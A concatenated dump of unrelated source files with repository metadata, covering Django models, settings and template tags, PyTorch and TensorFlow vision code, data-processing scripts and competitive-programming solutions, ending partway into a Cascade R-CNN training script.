| no_license | https://github.com/rephus/django-rest-template | 306e29a5108874efcdabd8c38457a79029da7f61 | a088dd426fed3733ed7b1153919545a5cccd997c | refs/heads/master | 2020-04-15T14:42:55.913531 | 2019-01-11T00:56:45 | 2019-01-11T00:56:45 | 164,764,315 | 3 | 8 | null | null | null | null | null | null | null | null | null | null | null | null | null | import uuid
from django.db import models
from django_extensions.db.models import TimeStampedModel
class Task(TimeStampedModel, models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
title = models.CharField(max_length=200)
description = models.CharField(max_length=200, default=None, null=True, blank=True)
completed = models.BooleanField(default=False)
due = models.DateTimeField(default=None, blank=True, null=True)
| UTF-8 | Python | false | false | 476 | py | 12 | models.py | 8 | 0.771008 | 0.756303 | 0 | 11 | 42.272727 | 87 |
simtol/EffectivePython2nd | 19,198,503,821,466 | ddc334e16aea80888c1e77238eedcf958323bd3f | a0bd18d49044bcb38bb8b0f9d5983cad0cf5461a | /master/chapter8/item72.py | 5ea606e27bde285136fc18b7a631f0e26b9edcb3 | []
| no_license | https://github.com/simtol/EffectivePython2nd | 40d14256cbbfcd041427611bfcd54fd521046c3c | 913782212ec0952f59d6ded8566fe797b3ac7978 | refs/heads/main | 2023-03-01T09:21:29.987291 | 2021-02-12T02:06:12 | 2021-02-12T02:06:12 | 338,195,148 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# 아이템 72
#
data = list(range(10**5))
index = data.index(91234)
assert index == 91234
def find_closest(sequence, goal):
for index, value in enumerate(sequence):
if goal < value:
return index
    raise ValueError(f'Out of range: {goal}')
index = find_closest(data, 91234.56)
assert index == 91235
from bisect import bisect_left
index = bisect_left(data, 91234)  # exact match
assert index == 91234
index = bisect_left(data, 91234.56)  # matches the closest value
assert index == 91235
index = bisect_left(data, 91234.23)  # matches the closest value (the nearest value >= the target)
assert index == 91235
import random
import timeit
size = 10 ** 5
iterations = 1000
data = list(range(size))
to_lookup = [random.randint(0, size)
for _ in range(iterations)]
def run_linear(data, to_lookup):
for index in to_lookup:
data.index(index)
def run_bisect(data, to_lookup):
for index in to_lookup:
bisect_left(data, index)
baseline = timeit.timeit(
stmt='run_linear(data, to_lookup)',
globals=globals(),
number=10)
print(f'선형 검색: {baseline:.6f}초')
comparison = timeit.timeit(
stmt='run_bisect(data, to_lookup)',
globals=globals(),
number=10)
print(f'이진 검색: {comparison:.6f}초')
slowdown = 1 + ((baseline - comparison) / comparison)
print(f'선형검색이 {slowdown:.1f}배 더 걸림')
| UTF-8 | Python | false | false | 1,488 | py | 58 | item72.py | 52 | 0.627566 | 0.571114 | 0 | 59 | 21.084746 | 71 |
YirongMao/COSONet | 14,233,521,655,833 | e10aba3ec6524571f8d505584a2c747e28c36302 | 05844d09831bd2b816d9a4b3f3001d04705e601f | /read_utils.py | 075de1f13c0687f9b662d3cd77a09623d90854d3 | []
| no_license | https://github.com/YirongMao/COSONet | 78dba9e9501889d794e97d1b73a658159fc944d6 | 20e92c577ff448588e82c603f4bcc785be90f615 | refs/heads/master | 2020-04-08T04:23:18.762943 | 2018-12-27T07:00:25 | 2018-12-27T07:00:25 | 159,014,162 | 11 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | from PIL import Image
import PIL
import os
import os.path
import torch.utils.data as data
import numpy as np
import torchvision.transforms as transforms
import time
# input_image_size = 224
webface_train_transforms = transforms.Compose([
transforms.RandomCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5409566, 0.41063643, 0.3478864), (0.27481332, 0.23811759, 0.22841948))
])
def default_loader(path, smaller_side_size=256):
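    """Load an RGB image and resize it (bilinear) so that its smaller side equals smaller_side_size."""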
r_img = Image.open(path).convert('RGB')
size = r_img.size
h = size[0]
w = size[1]
if h > w:
scale = smaller_side_size/w
else:
scale = smaller_side_size/h
new_h = round(scale*h)
new_w = round(scale*w)
r_img = r_img.resize((new_h, new_w), PIL.Image.BILINEAR)
return r_img
class ImageFilelist(data.Dataset):
def __init__(self, fname, root_dir=None, transform=None, loader=default_loader, five_crop=False):
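        """Dataset built from a list file whose lines are "<image path> <integer label>"; paths are joined with root_dir if given."""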
self.root_dir = root_dir
self.transform = transform
self.loader = loader
self.five_crop = five_crop
fid = open(fname, 'r')
lines = fid.readlines()
imgs = []
classes = set()
for line in lines:
file, label = line.strip().split(' ')
label = int(label)
item = (file, label)
imgs.append(item)
classes.add(label)
self.imgs = imgs
self.classes = list(classes)
def __getitem__(self, index):
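        # Returns (image, label, path); when five_crop is set, the loader is expected to yield multiple crops.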
file, label = self.imgs[index]
if self.root_dir is not None:
path = os.path.join(self.root_dir, file)
else:
path = file
if not self.five_crop:
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
label = int(label)
return img, label, path
else:
imgs = self.loader(path)
lst_img = []
for img in imgs:
if self.transform is not None:
img = self.transform(img)
lst_img.append(img)
label = int(label)
return lst_img, label, path
def __len__(self):
return len(self.imgs)
| UTF-8 | Python | false | false | 2,248 | py | 12 | read_utils.py | 10 | 0.564947 | 0.536922 | 0 | 83 | 26.084337 | 101 |
zaheerkhancs/QuantumNeuralNetwork | 13,735,305,460,930 | 9170e311838d86c5c155750a147dbb659def9a53 | 4eeee252acc1a6b55fbb981ed08110047bd3d017 | /data_processor.py | adcfa97b4393d7230c3037db1ce06af7bed21b08 | []
| no_license | https://github.com/zaheerkhancs/QuantumNeuralNetwork | 58e58d044ca4389438ca4c370bb6dbb7760cf392 | ce5654c36d45868cf5a7a53bef460f41e19e6c5d | refs/heads/master | 2022-02-20T22:08:07.618034 | 2019-09-17T04:32:21 | 2019-09-17T04:32:21 | 208,957,603 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""For processing data from https://www.kaggle.com/mlg-ulb/creditcardfraud"""
import csv
import numpy as np
import random
# creditcard.csv downloaded from https://www.kaggle.com/mlg-ulb/creditcardfraud
with open('creditcard.csv', 'r') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
data = list(csv_reader)
data = data[1:]
data_genuine = []
data_fraudulent = []
# Splitting genuine and fraudulent data
for i in range(len(data)):
if int(data[i][30]) == 0:
data_genuine.append([float(i) for i in data[i]])
if int(data[i][30]) == 1:
data_fraudulent.append([float(i) for i in data[i]])
fraudulent_data_points = len(data_fraudulent)
# We want the genuine data points to be 3x the fraudulent ones
undersampling_ratio = 3
genuine_data_points = fraudulent_data_points * undersampling_ratio
random.shuffle(data_genuine)
random.shuffle(data_fraudulent)
# Fraudulent and genuine transactions are split into two datasets for cross validation
data_fraudulent_1 = data_fraudulent[:int(fraudulent_data_points / 2)]
data_fraudulent_2 = data_fraudulent[int(fraudulent_data_points / 2):]
data_genuine_1 = data_genuine[:int(genuine_data_points / 2)]
data_genuine_2 = data_genuine[int(genuine_data_points / 2):genuine_data_points]
data_genuine_remaining = data_genuine[genuine_data_points:]
random.shuffle(data_fraudulent_1)
random.shuffle(data_fraudulent_2)
random.shuffle(data_genuine_1)
random.shuffle(data_genuine_2)
np.savetxt('creditcard_genuine_1.csv', data_genuine_1, delimiter=',')
np.savetxt('creditcard_genuine_2.csv', data_genuine_2, delimiter=',')
np.savetxt('creditcard_fraudulent_1.csv', data_fraudulent_1, delimiter=',')
np.savetxt('creditcard_fraudulent_2.csv', data_fraudulent_2, delimiter=',')
# Larger datasets are used for testing, including genuine transactions unseen in training
np.savetxt('creditcard_combined_1_big.csv', data_fraudulent_1 + data_genuine_1 + data_genuine_remaining, delimiter=',')
np.savetxt('creditcard_combined_2_big.csv', data_fraudulent_2 + data_genuine_2 + data_genuine_remaining, delimiter=',')
| UTF-8 | Python | false | false | 2,675 | py | 5 | data_processor.py | 2 | 0.748037 | 0.731963 | 0 | 66 | 39.530303 | 119 |
mst-solar-car/kicad-bom-generator | 19,653,770,369,592 | c85a270c8bc7c2726c29efd2adc067c938ca2ed9 | cbc5e26bb47ae69e80a3649c90275becf25ce404 | /Formatter/excel_formatter.py | 8f93a89358022a62fa75644c8f7ab99664d2e7da | [
"MIT"
]
| permissive | https://github.com/mst-solar-car/kicad-bom-generator | c3549409c3139f787ad28391372b5cb03791694a | 2aae905056d06f3d25343a8d784049c141d05640 | refs/heads/master | 2021-09-07T14:00:40.759486 | 2018-02-23T23:21:13 | 2018-02-23T23:21:13 | 107,868,801 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import Arguments
import Formatter
import Config
import Logger
from Utils import *
import xlsxwriter
args = Arguments.Parse()
cfg = Config.Get()
@Formatter.Register("xlsx")
def excel_formatter(components):
""" Formats a list of components into an excel spreadsheet """
save_path = args.output_file
workbook = xlsxwriter.Workbook(save_path)
ws = workbook.add_worksheet('BOM')
# Create styling for the header titles
header_style = workbook.add_format({
'font_size': 16,
'bold': True,
'align': 'center',
'bottom': 2,
'right': 1,
})
# Create styling for general row
row_style = workbook.add_format({
'right': 1,
'bottom': 1
})
columns = cfg['columns'] # List of columns
# Add the columns to the file
for col in range(0, len(columns)):
ws.write(0, col, denormalizeStr(columns[col]), header_style)
# Add a row for each component
for row in range(0, len(components)):
for col in range(0, len(columns)):
try:
ws.write(row + 1, col, components[row][columns[col]], row_style)
except:
ws.write(row + 1, col, cfg['emptyValue'], row_style)
# Close the file
workbook.close()
return save_path
| UTF-8 | Python | false | false | 1,200 | py | 42 | excel_formatter.py | 36 | 0.655833 | 0.645833 | 0 | 54 | 21.203704 | 72 |
braskin/pd | 12,927,851,587,101 | 707ded8c96202e033b67a264c2bbe5badf06861e | bbc8fbbdd40665af61fedf69962b38c1d5939683 | /apps/account/templatetags/util_tags.py | 5e479f6c5d6e6ee59165db6a697af2f8568c6308 | []
| no_license | https://github.com/braskin/pd | 64b299ad8058e8d3939bc9778fd1576522f786b0 | df32f96b432c2f07e1a20bcbd84df3eccad5e29a | refs/heads/master | 2021-01-10T22:10:34.318229 | 2013-01-23T11:50:37 | 2013-01-23T11:50:37 | 7,773,119 | 0 | 1 | null | false | 2020-07-25T19:53:06 | 2013-01-23T11:09:43 | 2013-10-11T06:04:48 | 2013-01-23T11:52:07 | 7,088 | 0 | 1 | 1 | Python | false | false | from django import template
from django.conf import settings
from mydebug import *
register = template.Library()
@register.filter
def key(d, key_name):
try:
value = d[key_name]
except KeyError:
value = ''
return value
key = register.filter('key', key)
def raw(parser, token):
# Whatever is between {% raw %} and {% endraw %} will be preserved as
# raw, unrendered template code.
text = []
parse_until = 'endraw'
tolog("in raw tag")
tag_mapping = {
template.TOKEN_TEXT: ('', ''),
template.TOKEN_VAR: ('{{', '}}'),
template.TOKEN_BLOCK: ('{%', '%}'),
template.TOKEN_COMMENT: ('{#', '#}'),
}
# By the time this template tag is called, the template system has already
# lexed the template into tokens. Here, we loop over the tokens until
# {% endraw %} and parse them to TextNodes. We have to add the start and
# end bits (e.g. "{{" for variables) because those have already been
# stripped off in a previous part of the template-parsing process.
while parser.tokens:
token = parser.next_token()
if token.token_type == template.TOKEN_BLOCK and token.contents == parse_until:
return template.TextNode(u''.join(text))
start, end = tag_mapping[token.token_type]
text.append(u'%s%s%s' % (start, token.contents, end))
parser.unclosed_block_tag(parse_until)
raw = register.tag(raw)
class VerbatimNode(template.Node):
def __init__(self, text):
self.text = text
def render(self, context):
return self.text
def verbatim(parser, token):
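    # Re-emit everything up to {% endverbatim %} as literal text, restoring the tag/variable delimiters.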
text = []
while 1:
token = parser.tokens.pop(0)
if token.contents == 'endverbatim':
break
if token.token_type == template.TOKEN_VAR:
text.append('{{')
elif token.token_type == template.TOKEN_BLOCK:
text.append('{%')
text.append(token.contents)
if token.token_type == template.TOKEN_VAR:
text.append('}}')
elif token.token_type == template.TOKEN_BLOCK:
text.append('%}')
return VerbatimNode(''.join(text))
verbatim = register.tag(verbatim)
def google_anal_account():
return settings.GOOGLE_ANAL_ACCOUNT
def www_host():
return settings.WWW_HOST
def fb_app_id():
return settings.FB_API_KEY
register.simple_tag(google_anal_account)
register.simple_tag(www_host)
register.simple_tag(fb_app_id)
| UTF-8 | Python | false | false | 2,456 | py | 256 | util_tags.py | 172 | 0.619707 | 0.618893 | 0 | 84 | 28.238095 | 86 |
friendlywhales/lineup-web | 13,554,916,819,735 | 03e418d102519b3d0fb405af44a27dcbb8caa459 | b066191ce947eb7ca4acebd021070ee46eae4d05 | /backend/apiserver/settings.py | 8135742c0fa2c9e35d61fec3c9eb2cd8977112eb | []
| no_license | https://github.com/friendlywhales/lineup-web | 17624b8c17678eb1abd380fa603d5559ece83115 | ed06227b14a57791449a4c134c5a0955fc5b9f27 | refs/heads/master | 2022-12-04T20:08:13.482782 | 2020-09-01T07:59:49 | 2020-09-01T07:59:49 | 291,615,047 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
from corsheaders.defaults import default_headers
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = ''
DEBUG = True
ALLOWED_HOSTS = ['*']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_mysql',
'rest_framework',
'rest_framework.authtoken',
'dry_rest_permissions',
'silk',
'drf_yasg',
'corsheaders',
'social_django',
'accounts',
'currencies',
'contents',
'messaging',
'operations',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'accounts.social.middlewares.SocialAuthExceptionMiddleware',
'silk.middleware.SilkyMiddleware',
]
ROOT_URLCONF = 'apiserver.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'apiserver.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': '',
'USER': '',
'PASSWORD': '',
'OPTIONS': {
'charset': 'utf8mb4',
},
'HOST': '127.0.0.1',
'PORT': '23306',
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'accounts.User'
LANGUAGE_CODE = 'ko-kr'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'staticfiles')
AUTHENTICATION_BACKENDS = (
'steemconnect.backends.SteemConnectOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'DEFAULT_AUTHENTICATION_CLASSES': (
# 'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
'DEFAULT_PAGINATION_CLASS': 'apiserver.helpers.rest_framework.paginations.DefaultCursorPaginationClass',
'PAGE_SIZE': 4,
}
MAX_USER_PROMOTION_CODE_NUMBER = 3
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'uploads')
MEDIA_URL = '/media/'
CORS_ORIGIN_ALLOW_ALL = True # only for DEBUG mode
# CORS_ORIGIN_WHITELIST = (
# 'line-up.me',
# 'localhost:8080',
# 'localhost:8081',
# 'localhost:8082',
# )
CORS_EXPOSE_HEADERS = [
'LineUp-Total-Number',
'LineUp-Page-Next-Link',
'LineUp-Page-Previous-Link',
]
SOCIAL_AUTH_PIPELINE = (
'social_core.pipeline.social_auth.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
# 'social_core.pipeline.social_auth.social_user',
'accounts.social.pipeline.steem.social_user',
'social_core.pipeline.user.get_username',
'social_core.pipeline.social_auth.associate_by_email',
'social_core.pipeline.user.create_user',
'accounts.social.pipeline.issue_signup_point',
'social_core.pipeline.social_auth.associate_user',
'social_core.pipeline.debug.debug',
'social_core.pipeline.social_auth.load_extra_data',
'social_core.pipeline.user.user_details',
'social_core.pipeline.debug.debug',
'accounts.social.pipeline.steem.user_info',
)
NICKNAME_LENGTH_RANGE = (2, 50, )
SOCIAL_AUTH_STEEMCONNECT_KEY = 'lineup.app'
SOCIAL_AUTH_STEEMCONNECT_DEFAULT_SCOPE = ['vote', 'comment']
LOGIN_REDIRECT_URL = '/social-auth/login/done/'
STEEMCONNECT_SOCIAL_AUTH_RAISE_EXCEPTIONS = True
SOCIAL_AUTH_RAISE_EXCEPTIONS = True
RAISE_EXCEPTIONS = True
SOCIAL_AUTH_SANITIZE_REDIRECTS = False
FRONT_HOSTNAME = 'http://127.0.0.1:8084'
FRONTEND_LOGIN_REDIRECT_URL = f'{FRONT_HOSTNAME}/social-auth/login/done'
FRONTEND_LOGIN_URL = f'{FRONT_HOSTNAME}/login'
INACTIVE_USER_URL = f'{FRONT_HOSTNAME}/login?status=inactive-user'
LOGIN_ERROR_URL = f'{FRONT_HOSTNAME}/login?status=error'
# SESSION_COOKIE_DOMAIN = "127.0.0.1"
# DEFAULT_USER_LEVEL = 'associate'  # default membership level assigned at sign-up
DEFAULT_USER_LEVEL = 'author'  # temporary: limited to before the June 2 event only.
DEFAULT_ASSET_REDIRECT_CACHE = 60 * 60 * 24
CORS_ALLOW_CREDENTIALS = False
CORS_ALLOW_HEADERS = default_headers + (
'access-control-allow-origin',
'access-control-allow-credentials',
)
CSRF_TRUSTED_ORIGINS = ['beta.line-up.me', 'www.line-up.me', 'line-up.me']
FILE_UPLOAD_PERMISSIONS = 0o644
SERVICE_ROOT_USERNAME = 'lineup'
SERVICE_TOKEN_SYMBOL = 'lineup'
LIMITATION_POINT_PER_DAY = 1_000
AVAILABLE_DELETION_PERIOD = 7 # days
MINIMUM_IMAGE_SIZE = 500 # px.
# AMAZON S3 settings---------------------------------------------------
AWS_STORAGE_BUCKET_NAME = 'lineup-user-assets'
AWS_ACCESS_KEY_ID = None
AWS_SECRET_ACCESS_KEY = None
AWS_REGION = 'ap-northeast-2'
AWS_S3_HOST = f's3-{AWS_REGION}.amazonaws.com'
S3_USE_SIGV4 = True
AWS_S3_FILE_OVERWRITE = False
AWS_S3_KEY_PREFIX = 'uploads'
# DEFAULT_FILE_STORAGE = 'apiserver.storages.aws_s3.MediaStorage'
AWS_S3_URL_EXPIRIATION = 60 * 60 * 24 * 30 # seconds
DATA_UPLOAD_MAX_MEMORY_SIZE = 1024 * 1024 * 8
FCM_API_KEY = os.environ['LINEUP_FCM_APIKEY']
# celery settings---------------------------------------------------
CELERY_BROKER_URL = 'redis://localhost:26379/0'
CELERY_RESULT_BACKEND = 'redis://localhost:26379/2'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TASK_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Asia/Seoul'
CELERY_BEAT_SCHEDULE = {
}
BEZANT_ENDPOINT = 'testnet'
BEZANT_APIKEY = os.environ.get('BEZANT_APIKEY')
FRONTEND_PATH = os.path.join(
os.path.dirname(BASE_DIR), 'frontend', 'production-dist',
)
| UTF-8 | Python | false | false | 6,912 | py | 196 | settings.py | 130 | 0.669378 | 0.653399 | 0 | 266 | 24.87594 | 108 |
AsymmetricVentures/mypy-django | 9,440,338,167,999 | 6bdc0fcb841b438d6597fcef20480cb446f3a419 | 7942342d457276bb266228d0236af647b3d55477 | /django/utils/synch.pyi | ede96fb9f738a990f466541050a1b8acaa2a6c48 | [
"MIT"
]
| permissive | https://github.com/AsymmetricVentures/mypy-django | 847c4e521ce4dec9a10a1574f9c32b234dafd00b | f6e489f5cf5672ecede323132665ccc6306f50b8 | refs/heads/master | 2020-06-30T01:53:44.434394 | 2016-12-22T22:45:50 | 2016-12-22T22:45:50 | 74,397,884 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Stubs for django.utils.synch (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any
class RWLock:
mutex = ... # type: Any
can_read = ... # type: Any
can_write = ... # type: Any
active_readers = ... # type: int
active_writers = ... # type: int
waiting_readers = ... # type: int
waiting_writers = ... # type: int
def __init__(self) -> None: ...
def reader_enters(self): ...
def reader_leaves(self): ...
def reader(self): ...
def writer_enters(self): ...
def writer_leaves(self): ...
def writer(self): ...
| UTF-8 | Python | false | false | 629 | pyi | 404 | synch.pyi | 404 | 0.578696 | 0.575517 | 0 | 21 | 28.952381 | 75 |
a1403951401/PyDaMo | 11,407,433,172,134 | 079f6fd86973155e3cb16931dd2ac39e6513766f | 6ff56a0d34ef5d3577852f39ec400208d5046855 | /DaMo/err.py | a4fe498f177e82aaf11cdc6f9b905b36b5c2fd96 | []
| no_license | https://github.com/a1403951401/PyDaMo | d4c3536cd5855682950d286ec6db8d23412a3701 | a880758ec28ff6c51920e302c3c30f20084da146 | refs/heads/master | 2020-08-25T08:22:13.128489 | 2019-10-22T06:30:41 | 2019-10-22T06:30:41 | 216,986,996 | 4 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 请求错误的类型
class VIP_Err(Exception):
code = {
-1: "无法连接网络, (可能防火墙拦截, 如果可以正常访问大漠插件网站,那就可以肯定是被防火墙拦截)",
-2: "进程没有以管理员方式运行.(出现在win7 win8 vista 2008.建议关闭uac)",
0: "失败(未知错误)",
1: "大漠注册成功",
2: "余额不足",
3: "绑定了本机器,但是账户余额不足50元.",
4: "注册码错误",
5: "你的机器或者IP在黑名单列表中或者不在白名单列表中",
6: "非法使用插件",
7: "你的帐号因为非法使用被封禁. (如果是在虚拟机中使用插件,必须使用Reg或者RegEx,不能使用RegNoMac或者RegExNoMac, 否则可能会造成封号,或者封禁机器)",
8: "ver_info不在你设置的附加白名单中",
77: "机器码或者IP因为非法使用,而被封禁. (如果是在虚拟机中使用插件,必须使用Reg或者RegEx,不能使用RegNoMac或者RegExNoMac, 否则可能会造成封号,或者封禁机器)封禁是全局的,如果使用了别人的软件导致77,也一样会导致所有注册码均无法注册。解决办法是更换IP,更换MAC",
-8: "版本附加信息长度超过了20",
-9: "版本附加信息里包含了非法字母",
}
    def __init__(self, message):
        if message in self.code:
            self.leng = self.code[message]
        else:
            self.leng = message
def __str__(self):
return self.leng
| UTF-8 | Python | false | false | 1,585 | py | 10 | err.py | 9 | 0.598691 | 0.569248 | 0 | 27 | 32.962963 | 161 |
recuraki/PythonJunkTest | 16,535,624,092,381 | 155485641ed77e32116d99460907bb3787bfe9ff | 4a8c1f7d9935609b780aff95c886ef7781967be0 | /atcoder/_codeforces/1359_b.py | 3a9bbb603bd1f49ffcf55d202be404d0821ed4c6 | []
| no_license | https://github.com/recuraki/PythonJunkTest | d5e5f5957ac5dd0c539ef47759b1fe5ef7a2c52a | 2556c973d468a6988d307ce85c5f2f8ab15e759a | refs/heads/master | 2023-08-09T17:42:21.875768 | 2023-07-18T23:06:31 | 2023-07-18T23:06:31 | 13,790,016 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
from io import StringIO
import unittest
import logging
logging.basicConfig(level=logging.DEBUG)
def resolve():
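    # Greedy tiling: if two 1x1 tiles cost no more than one 1x2 tile, just count the '.' cells;
    # otherwise scan each row and cover adjacent '.' pairs with 1x2 tiles where possible.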
from pprint import pprint
import sys
q = int(input())
for _ in range(q):
n, m, x, y = map(int, input().split())
maze = []
for i in range(n):
s = input()
maze.append(list(s))
if x * 2 <= y: # 1x1 is best!
cnt = 0
for i in range(n):
cnt += maze[i].count(".")
print(cnt * x)
else: # 1x2 can use
cost = 0
for i in range(n):
j = 0
while j < m:
if maze[i][j] == "*":
j += 1
continue
nj = j + 1
if nj >= m:
cost += x # use 1x1
j += 1
continue
if maze[i][nj] == ".": # use 1x2
cost += y
j += 2
continue
cost += x
j += 1
print(cost)
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_input_1(self):
print("test_input_1")
input = """5
1 1 10 1
.
1 2 10 1
..
2 1 10 1
.
.
3 3 3 7
..*
*..
.*.
3 3 7 3
...
...
..."""
output = """10
1
20
18
30"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main() | UTF-8 | Python | false | false | 1,789 | py | 1,170 | 1359_b.py | 1,143 | 0.406372 | 0.376188 | 0 | 81 | 21.098765 | 59 |
Aasthaengg/IBMdataset | 10,651,518,894,575 | e073dbedb29021f87d5224dd1c78aaa0e64e11bf | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02632/s292618205.py | e3e76f22e4c3ca5583413714aa64de5463e69964 | []
| no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
input = sys.stdin.readline
K = int(input())
S = list(input())[: -1]
N = len(S)
mod = 10 ** 9 + 7
class Factorial:
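    """Precompute factorials and inverse factorials modulo `mod` (via Fermat's little theorem) for O(1) binomial coefficients."""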
def __init__(self, n, mod):
self.f = [1]
for i in range(1, n + 1):
self.f.append(self.f[-1] * i % mod)
self.i = [pow(self.f[-1], mod - 2, mod)]
for i in range(1, n + 1)[: : -1]:
self.i.append(self.i[-1] * i % mod)
self.i.reverse()
def factorial(self, i):
return self.f[i]
def ifactorial(self, i):
return self.i[i]
def combi(self, n, k):
return self.f[n] * self.i[n - k] % mod * self.i[k] % mod
f = Factorial(N + K + 1, mod)
res = 0
for l in range(K + 1):
r = K - l
res += f.combi(l + N - 1, l) * pow(25, l, mod) % mod * pow(26, r, mod) % mod
res %= mod
print(res) | UTF-8 | Python | false | false | 749 | py | 202,060 | s292618205.py | 202,055 | 0.523364 | 0.492657 | 0 | 31 | 23.193548 | 78 |
smallsunsun1/Cascade-RCNN | 9,457,518,015,982 | ccab8b9ce5ac7e58f22c1233b7d4c36ca6818e65 | 3f4467e4501e8cee2c22d31784b05b10acee2fb7 | /train.py | 1dbb4537f9355e8903ee297586d901e2dfe79280 | []
| no_license | https://github.com/smallsunsun1/Cascade-RCNN | 7babbefd22d3be506773dc2204612c58b21f059e | 7a0bc01bddb4547523f8b490e4a16cdd4c77d746 | refs/heads/master | 2020-12-03T12:40:16.743165 | 2020-02-07T15:08:34 | 2020-02-07T15:08:34 | 231,319,366 | 7 | 4 | null | null | null | null | null | null | null | null | null | null | null | null | null | import argparse
import numpy as np
import tensorflow as tf
import os
import cv2
import json
import re
import time
from tensorflow import keras
from tensorflow.contrib import distribute
from config.config import _C
from model import model_frcnn
from model.basemodel import resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from model.model_rpn import rpn_head, generate_rpn_proposals, rpn_losses, RPNHead
from model.model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses, \
slice_feature_and_anchors
from model.model_box import RPNAnchors, clip_boxes, roi_align, decoded_output_boxes
from model.model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, \
sample_fast_rcnn_targets, fastrcnn_predictions_v2
from model.model_cascade import CascadeRCNNHead
from util.common import image_preprocess
from util.data import tf_get_all_anchors, tf_get_all_anchors_fpn
from util.data_loader import input_fn, test_input_fn, eval_input_fn
tf.logging.set_verbosity(tf.logging.INFO)
def map_boxes_back(boxes, features):
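    """Map predicted boxes from the resized/padded inference image back to the original image's coordinate frame."""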
h_pre = features['h_pre']
w_pre = features['w_pre']
h_now = features['h_now']
w_now = features['w_now']
scale = features['scale']
if scale > 1:
true_h = w_now / scale
pad_h_top = (h_now - true_h) // 2
pad_w_left = 0
true_w = w_now
else:
true_w = h_now * scale
pad_w_left = (w_now - true_w) // 2
pad_h_top = 0
true_h = h_now
boxes[:, 0] = boxes[:, 0] - pad_w_left
boxes[:, 1] = boxes[:, 1] - pad_h_top
boxes[:, 2] = boxes[:, 2] - pad_w_left
boxes[:, 3] = boxes[:, 3] - pad_h_top
boxes[:, 0] = boxes[:, 0] / true_w * w_pre
boxes[:, 1] = boxes[:, 1] / true_h * h_pre
boxes[:, 2] = boxes[:, 2] / true_w * w_pre
boxes[:, 3] = boxes[:, 3] / true_h * h_pre
return boxes
def resnet_c4_model_fn(features, labels, mode, params):
